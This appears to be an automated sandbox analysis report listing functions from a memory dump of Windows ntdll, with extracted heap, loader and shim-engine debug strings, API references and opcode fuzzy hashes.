Opcode ID: 84258e29c589617eab6ede0b1c44a1610a7c5a9abedde747ac5e1fca48c6b344
Instruction ID: 19c8b4c9aca76893682215a5c06f2b8b2f77736cede956a7e055f717f0bec030
Opcode Fuzzy Hash: 84258e29c589617eab6ede0b1c44a1610a7c5a9abedde747ac5e1fca48c6b344
Instruction Fuzzy Hash: 4A413839914681DFC721DF24C594B69B3B9FF41324F148B69E4065B781C738AD80CB99

Uniqueness

Uniqueness Score: -1.00%

Function 1EA1DAC0, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA5F561

Strings

, passed to %s, xrefs: 1EA5F5B2
HEAP: , xrefs: 1EA5F597
Invalid heap signature for heap at %p, xrefs: 1EA5F5A3
HEAP[%wZ]: , xrefs: 1EA5F58A
RtlLockHeap, xrefs: 1EA5F5AD

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
API String ID: 3446177414-1222099010
Opcode ID: 1efba5d9c710823f48f5d9b0372f3bbeaa48fa2acfc901216436ac7d9d639f9b
Instruction ID: 6dcd125013c4d7887984d7d934d36b1570cdc5c619167457ad277388f792d90d
Opcode Fuzzy Hash: 1efba5d9c710823f48f5d9b0372f3bbeaa48fa2acfc901216436ac7d9d639f9b
Instruction Fuzzy Hash: 093121395146C49FD722EB28C818B9977ADEF41624F004B89E4034BB91C779BD80CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 1EA24C3D, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA24C84

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 1EA6344A, 1EA63476
LdrpFindDllActivationContext, xrefs: 1EA63440, 1EA6346C
Querying the active activation context failed with status 0x%08lx, xrefs: 1EA63466
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1EA63439

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-3779518884
Opcode ID: c1aa2d303c93b73f8687bb095e586cf44436bd898b80068759445b6ae54fda3a
Instruction ID: f09ad54f7714df643571ff042404c42e0ee503505ae7630405753824bce43cee
Opcode Fuzzy Hash: c1aa2d303c93b73f8687bb095e586cf44436bd898b80068759445b6ae54fda3a
Instruction Fuzzy Hash: A9310972E003A3AFD711EB0DC894B65BAB6FB45754F82C37AD5017B250D7609C80C799

Uniqueness

Uniqueness Score: -1.00%

Function 1EA00680, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

(UCRBlock->Size >= *Size), xrefs: 1EA54ED7
HEAP: , xrefs: 1EA54ECA
HEAP[%wZ]: , xrefs: 1EA54EBB

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 26982e91f3027784a1974d71ac6240fe61a758aa084a9108eb4bc8d7d014df61
Instruction ID: bb43704af67f4534bb99cab92b8ab0f3a9a236323ea29d4e3e653058ed3bad6c
Opcode Fuzzy Hash: 26982e91f3027784a1974d71ac6240fe61a758aa084a9108eb4bc8d7d014df61
Instruction Fuzzy Hash: C6F1CB70A00642DFDB05CF69D890B6AB7F6FF44300F208AA8E5469B381D774ED81CB98

Uniqueness

Uniqueness Score: -1.00%

Function 1EA10AEB, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA10BFC

Strings

Failed to allocated memory for shimmed module list, xrefs: 1EA59F1C
minkernel\ntdll\ldrinit.c, xrefs: 1EA59F2E
LdrpCheckModule, xrefs: 1EA59F24

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-161242083
Opcode ID: 2a10b0dc8d4b90674b27fadffb39a6916b719161f38e8ae8c83c08bbc1a5ee82
Instruction ID: 991a9d7198f5c34f2f4537b7b294c0498fc562d99b9682551422e8a74e867182
Opcode Fuzzy Hash: 2a10b0dc8d4b90674b27fadffb39a6916b719161f38e8ae8c83c08bbc1a5ee82
Instruction Fuzzy Hash: 3571BF75A002559FCB04DF68C990AAEB7F5EF84308F18866DE805EF754E734AD42CB58

Uniqueness

Uniqueness Score: -1.00%

Function 1EACACEB, Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EACAEA9
RtlDebugPrintTimes.NTDLL ref: 1EACB185

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 6051c57a3f19ef26ce20092e4d32ce6ccda2c1321118ade67225147b90f190d0
Instruction ID: e592507e03efc0ed7b54317f551f616bf0bf139958c6939dda085deec9d402fc
Opcode Fuzzy Hash: 6051c57a3f19ef26ce20092e4d32ce6ccda2c1321118ade67225147b90f190d0
Instruction Fuzzy Hash: 76F10772E006618FCB18CFA9C9A067DFBF6AF8820071A466DD457DB384D635EE41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 1EA1EE48, Relevance: 6.3, APIs: 4, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4e6b3d2aeb963b103aeb0b5927edb34871b238fa00e5f1622160195889f192b
Instruction ID: 5a386ad6cc14de2cd0fde775477d6a8be0dc857acfd2da6158e960eb078fde71
Opcode Fuzzy Hash: f4e6b3d2aeb963b103aeb0b5927edb34871b238fa00e5f1622160195889f192b
Instruction Fuzzy Hash: E9E10779D00688DFCB24CFA9D980A9DBBF5FF58310F24462AE546AB364D731A881CF14

Uniqueness

Uniqueness Score: -1.00%

Function 1EA24B79, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

0, xrefs: 1EA24BE3
Flst, xrefs: 1EA24BB6

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: 0$Flst
API String ID: 0-758220159
Opcode ID: e3e3101acf8f884ddb8ff9af428de337590741e0d95f6cd297abf5d858b2ae85
Instruction ID: ae183ecb46e03408f7f2baf3bc3215f201651de08f64ebb54ecb68678c4c27ee
Opcode Fuzzy Hash: e3e3101acf8f884ddb8ff9af428de337590741e0d95f6cd297abf5d858b2ae85
Instruction Fuzzy Hash: C751CBB1E1069A8FCB14CF99C584759FBF6EF44B14F54823AD045AB244E7B09D86CB88

Uniqueness

Uniqueness Score: -1.00%

Function 1EA6CE40, Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
Instruction ID: 1c6597147d9f966534852ef519923f21b040bc5c37f264ace0944c74930bdef4
Opcode Fuzzy Hash: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
Instruction Fuzzy Hash: C0510471E10206DFCB08CFA9C59169ABBF1FB4D314B20826ED819A7345E734EA91CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1EACA1F0, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EACA25D
RtlDebugPrintTimes.NTDLL ref: 1EACA2F1
RtlDebugPrintTimes.NTDLL ref: 1EACA314
RtlDebugPrintTimes.NTDLL ref: 1EACA340
RtlDebugPrintTimes.NTDLL ref: 1EACA415
RtlDebugPrintTimes.NTDLL ref: 1EACA468
RtlDebugPrintTimes.NTDLL ref: 1EACA487
RtlDebugPrintTimes.NTDLL ref: 1EACA4B8

Strings

HEAP: , xrefs: 1EACA206

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: HEAP:
API String ID: 3446177414-2466845122
Opcode ID: 7712881d8c7e6b1db928f732716c6a27489ca20c29022b89bc9b0ec988550444
Instruction ID: 7c27adf60e55486e8ded48502bf165d27e3770da11b7d71111cf8f84d9fa5ae2
Opcode Fuzzy Hash: 7712881d8c7e6b1db928f732716c6a27489ca20c29022b89bc9b0ec988550444
Instruction Fuzzy Hash: ADA1A075A143228FD704CF28C8A4A2AB7E6FF88710F15466DE946DB321E730EC42CB95

Uniqueness

Uniqueness Score: -1.00%

Function 1EA27550, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Processing section info %ws..., xrefs: 1EA64592
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 1EA64530
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 1EA64507
Execute=1, xrefs: 1EA6451E
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 1EA6454D
ExecuteOptions, xrefs: 1EA644AB
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 1EA64460

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 88e6b7b622fbd5cc2c93ac449ea040cc3f5e104d1b209b87aa48f5f74668f169
Instruction ID: 22dce5c519eb246d086d81084f2d29af96bfd13bec3121125f39b59331df13b9
Opcode Fuzzy Hash: 88e6b7b622fbd5cc2c93ac449ea040cc3f5e104d1b209b87aa48f5f74668f169
Instruction Fuzzy Hash: 37512971A0025A6ADB109BA5DD95FAD77A9BF08304F500BF9F505B7180D730AF45CF58

Uniqueness

Uniqueness Score: -1.00%

Function 1EA0A170, Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON

Download Yara Rule

Strings

SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1EA577E2
Actx , xrefs: 1EA57819, 1EA57880
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1EA57807
RtlpFindActivationContextSection_CheckParameters, xrefs: 1EA577DD, 1EA57802
RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 1EA578F3
SsHd, xrefs: 1EA0A304

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
API String ID: 0-1988757188
Opcode ID: 5d78ac92fa47c026b3da4a56916d03a1b27242d570caa47fbf90e478e011f532
Instruction ID: ecc5e163bbbad7c6ff5bdd8431571a4221ec423896015408d5c4a5e2a6ecc59f
Opcode Fuzzy Hash: 5d78ac92fa47c026b3da4a56916d03a1b27242d570caa47fbf90e478e011f532
Instruction Fuzzy Hash: C8E1AF74A043428FD715CE25E8A4B5A7BE2BF89324F104B2DF8659B390D731EC85CB96

Uniqueness

Uniqueness Score: -1.00%

Function 1EA0D690, Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA59299

Strings

SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1EA59153
Actx , xrefs: 1EA59315
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1EA59178
GsHd, xrefs: 1EA0D794
RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 1EA59372
RtlpFindActivationContextSection_CheckParameters, xrefs: 1EA5914E, 1EA59173

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
API String ID: 3446177414-2196497285
Opcode ID: f997799eef0f0ae595c7531e98fe757abc02d42b40ed6d5146bd588b3102938a
Instruction ID: 5040935259cf31a68863bab70e1293599569207e90ded3fc4c6945dee55a50bb
Opcode Fuzzy Hash: f997799eef0f0ae595c7531e98fe757abc02d42b40ed6d5146bd588b3102938a
Instruction Fuzzy Hash: 7BE19F71604342CFD710CF29D880B5ABBE6BF89314F144B6DE9A58B381D771E948CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 1EA9F0A5, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA9F0D6

Strings

Just allocated block at %p for %Ix bytes, xrefs: 1EA9F288
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 1EA9F389
Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 1EA9F33E
HEAP: , xrefs: 1EA9F274, 1EA9F321, 1EA9F378
RtlAllocateHeap, xrefs: 1EA9F0ED
HEAP[%wZ]: , xrefs: 1EA9F267, 1EA9F314, 1EA9F36B

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 3446177414-1745908468
Opcode ID: 97143fd49e718d032f4d7a4dbe9e9f83c5758c9ed3aa95c5c353501c10cf9225
Instruction ID: c2edf468c01b9f55ba9c1f7b91e035f54797fcbf55a026acc32f7d90dc6feeb7
Opcode Fuzzy Hash: 97143fd49e718d032f4d7a4dbe9e9f83c5758c9ed3aa95c5c353501c10cf9225
Instruction Fuzzy Hash: 74912139900685DFCB02CFA8C440AAEBBFAFF89310F14865DE551AB751C735A981EB58

Uniqueness

Uniqueness Score: -1.00%

Function 1E9E640D, Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E9E651C

Part of subcall function 1E9E6565: RtlDebugPrintTimes.NTDLL ref: 1E9E6614
Part of subcall function 1E9E6565: RtlDebugPrintTimes.NTDLL ref: 1E9E665F

Strings

Loading the shim engine DLL failed with status 0x%08lx, xrefs: 1EA497B9
Getting the shim engine exports failed with status 0x%08lx, xrefs: 1EA49790
apphelp.dll, xrefs: 1E9E6446
minkernel\ntdll\ldrinit.c, xrefs: 1EA497A0, 1EA497C9
LdrpInitShimEngine, xrefs: 1EA49783, 1EA49796, 1EA497BF
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 1EA4977C

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-204845295
Opcode ID: 748d9bd65d840b03f497ce1e604976ec0c80ecce226a5fdc9cffa52200b21b69
Instruction ID: 70bf2900e9e7f11e5f43e2a723f0e045f303298e82f930b16955e197c9d008bc
Opcode Fuzzy Hash: 748d9bd65d840b03f497ce1e604976ec0c80ecce226a5fdc9cffa52200b21b69
Instruction Fuzzy Hash: 3A51C0752083529FD311CF24C890BAB77E4FF84614F184B5DF6859B651EB30EA05CB96

Uniqueness

Uniqueness Score: -1.00%

Function 1EA6FA02, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA6FAF3
RtlDebugPrintTimes.NTDLL ref: 1EA6FB15

Strings

Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx, xrefs: 1EA6FA58
$, xrefs: 1EA6FABD
Unknown, xrefs: 1EA6FA42, 1EA6FA54
LdrpRedirectDelayloadFailure, xrefs: 1EA6FA5E
minkernel\ntdll\ldrdload.c, xrefs: 1EA6FA68

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
API String ID: 3446177414-4227709934
Opcode ID: 2c9a5b4a1de290a18a8eee50a072a97ae977a1edf6b81c8044e348a3f100c77a
Instruction ID: 91205c61b8bf3ce50f900d0018d2564ad252b5ada37b82d0193cab696b1a3922
Opcode Fuzzy Hash: 2c9a5b4a1de290a18a8eee50a072a97ae977a1edf6b81c8044e348a3f100c77a
Instruction Fuzzy Hash: A1417FB9A00219AFCB01CF99C990AEEBBBAFF49354F544269E904B7340D7319E41DB94

Uniqueness

Uniqueness Score: -1.00%

Function 1EA9F8F8, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA9F92E

Strings

RtlFreeHeap, xrefs: 1EA9F948, 1EA9F9B2
HEAP: , xrefs: 1EA9F9F9, 1EA9FAE4
About to free block at %p, xrefs: 1EA9FA0A
About to free block at %p with tag %ws, xrefs: 1EA9FAFE
HEAP[%wZ]: , xrefs: 1EA9F9EC, 1EA9FAD7

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
API String ID: 3446177414-3492000579
Opcode ID: 66a3d225aeac7d2dc8d6bd73a3ea4950a7d5fbd63786c8bf3ff994ce82ebb0b9
Instruction ID: 2446381c687bbd169ff2f434b8b2fb8bf4790d708ddb602405ecb3c590291a89
Opcode Fuzzy Hash: 66a3d225aeac7d2dc8d6bd73a3ea4950a7d5fbd63786c8bf3ff994ce82ebb0b9
Instruction Fuzzy Hash: D371F0399006859FCB02CFA8C4A06BDFBFAFF89304F148659E445AB751C731AD81DB98

Uniqueness

Uniqueness Score: -1.00%

Function 1E9E6565, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E9E6614
RtlDebugPrintTimes.NTDLL ref: 1E9E665F

Strings

LdrpLoadShimEngine, xrefs: 1EA4984A, 1EA4988B
minkernel\ntdll\ldrinit.c, xrefs: 1EA49854, 1EA49895
Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1EA49885
Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1EA49843

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-3589223738
Opcode ID: ef6902c12dbd6c028c99a9d4b3bbd897f045f14f28fa3dfd1065e1ad9a8f7af3
Instruction ID: 43c3f0f06504e39a4d96983fd8dc6e34ee4f10332b8f5a2d5546f4f95ae36549
Opcode Fuzzy Hash: ef6902c12dbd6c028c99a9d4b3bbd897f045f14f28fa3dfd1065e1ad9a8f7af3
Instruction Fuzzy Hash: 27514675A103A59FCB05CBACCC94AED77B6BB84710F180769E641BF286DB70AC05CB94

Uniqueness

Uniqueness Score: -1.00%

Function 1EA1D6D0, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA1D879

Part of subcall function 1E9F4779: RtlDebugPrintTimes.NTDLL ref: 1E9F4817

Strings

LdrShutdownProcess, xrefs: 1EA5F0D8
minkernel\ntdll\ldrinit.c, xrefs: 1EA5F0E2
Process 0x%p (%wZ) exiting, xrefs: 1EA5F0D1
$, xrefs: 1EA1D78D
$, xrefs: 1EA1D820

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1975516107
Opcode ID: 2f9160ebc28fa975357bb940dfc885d0bcacfea42de34f90e2052110b0537ffc
Instruction ID: 3480dd476f545fc1954f026fa6cffed38a1e6397e0b4ec6002a5fee6c6df3227
Opcode Fuzzy Hash: 2f9160ebc28fa975357bb940dfc885d0bcacfea42de34f90e2052110b0537ffc
Instruction Fuzzy Hash: D151E17AE043969FDB04DFA8C58479EBBB2BF84314F244659D4007F281E774A986CBC8

Uniqueness

Uniqueness Score: -1.00%

Function 1EA9ECD7, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA9EDD0
RtlDebugPrintTimes.NTDLL ref: 1EA9EE45

Strings

---------------------------------------, xrefs: 1EA9EDF9
HEAP: , xrefs: 1EA9ECDD
Entry Heap Size , xrefs: 1EA9EDED
Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 1EA9EDE3

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
API String ID: 3446177414-1102453626
Opcode ID: 82af461a229d8effc575459a6618064452ff0106b8d2b178b7d84bded182c68f
Instruction ID: ae574d3e3899a891d76522cfdb7551877926d38a124da9960a99d05aaec4ca56
Opcode Fuzzy Hash: 82af461a229d8effc575459a6618064452ff0106b8d2b178b7d84bded182c68f
Instruction Fuzzy Hash: EC419D35A00626DFC705CF19C48495ABBEAFF49314B26C6ADE608AF712D731EC42DB94

Uniqueness

Uniqueness Score: -1.00%

Function 1E9F9046, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA52360

Strings

$, xrefs: 1E9F90B1
@, xrefs: 1E9F9095

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: $$@
API String ID: 3446177414-1194432280
Opcode ID: db84696a2770189440bc84ff262c04a56d31ce29b1940b91dde5d5aabcb20396
Instruction ID: b7cb2ce0d9d5228c33feeb0a8fccd88e7a02f6157be30456989a541a49a3b954
Opcode Fuzzy Hash: db84696a2770189440bc84ff262c04a56d31ce29b1940b91dde5d5aabcb20396
Instruction Fuzzy Hash: 7F812BB1D00269DBDB21CF94CD44BEEB6B8AF48714F0446EAE909B7240D7709E85CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 1EA1237A, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 1EA5A79F
apphelp.dll, xrefs: 1EA12382
minkernel\ntdll\ldrinit.c, xrefs: 1EA5A7AF
LdrpDynamicShimModule, xrefs: 1EA5A7A5

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
